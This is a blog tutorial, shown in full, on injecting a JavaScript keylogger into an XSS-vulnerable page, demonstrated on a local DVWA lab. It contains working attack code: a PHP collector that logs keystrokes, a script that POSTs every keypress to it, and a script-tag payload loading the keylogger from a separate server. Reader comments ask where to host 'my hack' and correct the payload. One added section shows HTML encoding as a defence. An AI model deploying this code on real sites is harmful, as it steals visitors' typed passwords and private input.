Sunday, 16 August 2015

How to inject keylogger on website via XSS | Rahul Tyagi

Dear Friends, in this tutorial we will learn how to install a JavaScript-based keylogger on an XSS-vulnerable website in order to capture the keystrokes of its visitors.

Cross-Site Scripting (XSS) vulnerabilities are a type of computer security vulnerability typically found in Web applications. XSS vulnerabilities enable attackers to inject client-side script into Web pages viewed by other users. Source: Wikipedia

Requirements
------------
1. XSS-vulnerable page
2. PHP script
3. JavaScript-based keylogger


XSS Vulnerable Website
----------------------

So let's first talk about the vulnerable website. We are using DVWA's XSS section as an example.

Step 1: Start your DVWA: http://127.0.0.1/dvwa/

Step 2: Go to the DVWA Security section first and set the security level to Low, as shown in the image below.


Step 3: Click on XSS Reflected and submit the payload <script>alert(0)</script> to check for XSS.

As you can see, the text box is not validating our input, and as a result we are able to execute our JavaScript. Now we have confirmed that the website is vulnerable to Cross-Site Scripting.
Now let's make a JavaScript-based keylogger, saved with the extension .js.
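The reason the alert fires is that the low-security page reflects the submitted value straight into the HTML. The following is an added example, not code from this post or from DVWA: a constructed stand-in for the "Hello <name>" page, written once in the vulnerable form and once with the parameter HTML-encoded (the same transformation PHP's htmlspecialchars performs), run against the two payloads used in the post. The containsScriptTag check is only there to make the difference visible; no real browser is involved.

```javascript
// Added example (not from the original post): the reflected-XSS sink the
// tutorial exploits, as a vulnerable render function next to a hardened one
// that HTML-encodes the untrusted parameter before reflecting it. The
// template is a constructed stand-in for DVWA's "Hello <name>" output.

// Encode the five characters with meaning in HTML text and attribute
// contexts, mirroring PHP's htmlspecialchars($s, ENT_QUOTES).
function escapeHtml(untrusted) {
  return String(untrusted)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#039;");
}

// Vulnerable: the query parameter is concatenated straight into the markup,
// so a value containing tags becomes live HTML in every visitor's browser.
function renderVulnerable(name) {
  return "<pre>Hello " + name + "</pre>";
}

// Hardened: the same template, but the parameter is encoded for an HTML
// text context first, so tags reach the browser as literal text.
function renderHardened(name) {
  return "<pre>Hello " + escapeHtml(name) + "</pre>";
}

// Crude check used only to make the difference visible: does the rendered
// page still contain a real <script ...> tag?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// The two payloads used in the post, as constructed test inputs.
const PAYLOADS = [
  "<script>alert(0)</script>",
  '<script src="http://192.168.1.45/keylogger/keylogger.js">',
];

// For each payload, report whether a script tag survives in each rendering.
function demo() {
  return PAYLOADS.map(function (p) {
    return {
      payload: p,
      vulnerableExecutes: containsScriptTag(renderVulnerable(p)),
      hardenedExecutes: containsScriptTag(renderHardened(p)),
    };
  });
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(JSON.stringify(demo(), null, 2));
}
```

Encoding is context-specific: this helper is correct for the HTML text and quoted-attribute contexts the DVWA page uses, but a value placed inside a script block, a URL or a CSS property needs the encoder for that context instead.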

PHP File Code : Required to Save the Logs
-----------------------------------------
Note: Name the file keylogger.php and upload it to your server so the logs can be retrieved later.

<?php
// Keystroke sent by the JavaScript keylogger in the POST body
$key = isset($_POST['key']) ? $_POST['key'] : '';
$logfile = "keylog.txt";
// Open the log in append mode so earlier keystrokes are kept
$fp = fopen($logfile, "a");
fwrite($fp, $key);
fclose($fp);
?>


As you can see above, the PHP file receives the keystroke sent by the POST request in the $key variable, opens a file named keylog.txt in append mode, and then writes every keystroke pressed by a user of the infected page to that file.

JavaScript Keylogger Code
-------------------------

    // Fire on every keypress anywhere in the document
    document.onkeypress = function(evt) {
       evt = evt || window.event;
       // Translate the key code into the character that was typed
       var key = String.fromCharCode(evt.charCode);
       if (key) {
          // Send the character to the PHP logger as a form-encoded POST
          var http = new XMLHttpRequest();
          var param = encodeURIComponent(key);
          http.open("POST", "YOUR .php file path", true);
          http.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
          http.send("key=" + param);
       }
    };


Here we have the .js file ready to fire, as shown in the screenshot below.

Payload & Exploit
-----------------
I have uploaded the keylogger.js file to my XAMPP server along with the PHP file.


Payload: <script src="http://192.168.1.45/keylogger/keylogger.js">
Just add this payload in the text box and execute the JavaScript. After the script executes you will see that a new keylog.txt file is created automatically on your server, and anything typed on the page is captured and saved to that text file.



*Here 192.168.1.45 is the IP address of my XAMPP server, on which DVWA is hosted.




3 comments:

Abhishek Joshi said...
This comment has been removed by the author.
Unknown said...

Are there any free servers I can use to host my hack?

QP Tester said...

You have to finish off the payload with < / script > (without the spaces) or it won't work.
